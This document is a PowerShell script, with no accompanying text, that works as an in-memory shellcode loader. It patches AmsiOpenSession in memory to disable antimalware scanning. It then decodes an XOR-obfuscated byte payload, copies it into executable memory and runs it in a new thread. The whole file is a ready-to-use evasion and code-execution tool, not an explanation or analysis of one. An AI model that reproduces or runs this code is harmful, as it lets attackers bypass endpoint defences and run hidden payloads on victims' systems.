function LookupFunc {

  Param ($moduleName, $functionName)

  $assem = ([AppDomain]::CurrentDomain.GetAssemblies() | 
    Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
      Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $tmp=@()
    $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
  return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName))
}

function getDelegateType {

  Param (
    [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
    [Parameter(Position = 1)] [Type] $delType = [Void]
  )

  $type = [AppDomain]::CurrentDomain.
    DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), 
    [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
      DefineDynamicModule('InMemoryModule', $false).
      DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', 
      [System.MulticastDelegate])

  $type.
    DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).
      SetImplementationFlags('Runtime, Managed')

  $type.
    DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
      SetImplementationFlags('Runtime, Managed')

  return $type.CreateType()
}

[IntPtr]$funcAddr = LookupFunc amsi.dll AmsiOpenSession
$oldProtectionBuffer = 0
$vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool])))
$vp.Invoke($funcAddr, 3, 0x40, [ref]$oldProtectionBuffer)
$buf = [Byte[]] (0x48, 0x31, 0xC0) 
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $funcAddr, 3)
$vp.Invoke($funcAddr, 3, 0x20, [ref]$oldProtectionBuffer)

$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40)

[Byte[]] $buf = 0xFE,0x4A,0x81,0xE6,0xF2,0xEA,0xCE,0x02,0x02,0x02,0x43,0x53,0x43,0x52,0x50,0x4A,0x33,0xD0,0x67,0x4A,0x89,0x50,0x62,0x53,0x54,0x4A,0x89,0x50,0x1A,0x4A,0x89,0x50,0x22,0x4F,0x33,0xCB,0x4A,0x89,0x70,0x52,0x4A,0x0D,0xB5,0x48,0x48,0x4A,0x33,0xC2,0xAE,0x3E,0x63,0x7E,0x00,0x2E,0x22,0x43,0xC3,0xCB,0x0F,0x43,0x03,0xC3,0xE0,0xEF,0x50,0x4A,0x89,0x50,0x22,0x89,0x40,0x3E,0x43,0x53,0x4A,0x03,0xD2,0x64,0x83,0x7A,0x1A,0x09,0x00,0x0D,0x87,0x70,0x02,0x02,0x02,0x89,0x82,0x8A,0x02,0x02,0x02,0x4A,0x87,0xC2,0x76,0x65,0x4A,0x03,0xD2,0x89,0x4A,0x1A,0x52,0x46,0x89,0x42,0x22,0x4B,0x03,0xD2,0xE1,0x54,0x4A,0xFD,0xCB,0x4F,0x33,0xCB,0x43,0x89,0x36,0x8A,0x4A,0x03,0xD4,0x4A,0x33,0xC2,0x43,0xC3,0xCB,0x0F,0xAE,0x43,0x03,0xC3,0x3A,0xE2,0x77,0xF3,0x4E,0x01,0x4E,0x26,0x0A,0x47,0x3B,0xD3,0x77,0xDA,0x5A,0x46,0x89,0x42,0x26,0x4B,0x03,0xD2,0x64,0x43,0x89,0x0E,0x4A,0x46,0x89,0x42,0x1E,0x4B,0x03,0xD2,0x43,0x89,0x06,0x8A,0x4A,0x03,0xD2,0x43,0x5A,0x43,0x5A,0x5C,0x5B,0x58,0x43,0x5A,0x43,0x5B,0x43,0x58,0x4A,0x81,0xEE,0x22,0x43,0x50,0xFD,0xE2,0x5A,0x43,0x5B,0x58,0x4A,0x89,0x10,0xEB,0x49,0xFD,0xFD,0xFD,0x5F,0x4B,0xBC,0x75,0x71,0x30,0x5D,0x31,0x30,0x02,0x02,0x43,0x54,0x4B,0x8B,0xE4,0x4A,0x83,0xEE,0xA2,0x03,0x02,0x02,0x4B,0x8B,0xE7,0x4B,0xBE,0x00,0x02,0x02,0x14,0xC2,0xAA,0x33,0x37,0x43,0x56,0x4B,0x8B,0xE6,0x4E,0x8B,0xF3,0x43,0xB8,0x4E,0x75,0x24,0x05,0xFD,0xD7,0x4E,0x8B,0xE8,0x6A,0x03,0x03,0x02,0x02,0x5B,0x43,0xB8,0x2B,0x82,0x69,0x02,0xFD,0xD7,0x68,0x08,0x43,0x5C,0x52,0x52,0x4F,0x33,0xCB,0x4F,0x33,0xC2,0x4A,0xFD,0xC2,0x4A,0x8B,0xC0,0x4A,0xFD,0xC2,0x4A,0x8B,0xC3,0x43,0xB8,0xE8,0x0D,0xDD,0xE2,0xFD,0xD7,0x4A,0x8B,0xC5,0x68,0x12,0x43,0x5A,0x4E,0x8B,0xE0,0x4A,0x8B,0xFB,0x43,0xB8,0x9B,0xA7,0x76,0x63,0xFD,0xD7,0x87,0xC2,0x76,0x08,0x4B,0xFD,0xCC,0x77,0xE7,0xEA,0x91,0x02,0x02,0x02,0x4A,0x81,0xEE,0x12,0x4A,0x8B,0xE0,0x4F,0x33,0xCB,0x68,0x06,0x43,0x5A,0x4A,0x8B,0xFB,0x43,0xB8,0x00,0xDB,0xCA,0x5D,0xFD,0xD7,0x81,0xFA,0x02,0x7C,0x57,0x4A,0x81,0xC6,0x22,0x5C,0x8B,0xF4,0x68,0x42,0x43,0x5B,0x6A,0x02,0x12,0x02,0x02,0x43,0x5A,0x4A,0x8B,0xF0,0x4A,0x33,0xCB,0x43,0xB8,0x5A,0xA6,0x51,0xE7,0xFD,0xD7,0x4A,0x8B,0xC1,0x4B,0x8B,0xC5,0x4F,0x33,0xCB,0x4B,0x8B,0xF2,0x4A,0x8B,0xD8,0x4A,0x8B,0xFB,0x43,0xB8,0x00,0xDB,0xCA,0x5D,0xFD,0xD7,0x81,0xFA,0x02,0x7F,0x2A,0x5A,0x43,0x55,0x5B,0x6A,0x02,0x42,0x02,0x02,0x43,0x5A,0x68,0x02,0x58,0x43,0xB8,0x09,0x2D,0x0D,0x32,0xFD,0xD7,0x55,0x5B,0x43,0xB8,0x77,0x6C,0x4F,0x63,0xFD,0xD7,0x4B,0xFD,0xCC,0xEB,0x3E,0xFD,0xFD,0xFD,0x4A,0x03,0xC1,0x4A,0x2B,0xC4,0x4A,0x87,0xF4,0x77,0xB6,0x43,0xFD,0xE5,0x5A,0x68,0x02,0x5B,0xB9,0xE2,0x1F,0x28,0x08,0x43,0x8B,0xD8,0xFD,0xD7

$key = 2
$c = $buf | ForEach-Object { $_ -bxor $key }
$buf = $c

[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)

$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread), (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)

[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject), (getDelegateType @([IntPtr], [Int32]) ([Int]))).Invoke($hThread, 0xFFFFFFFF)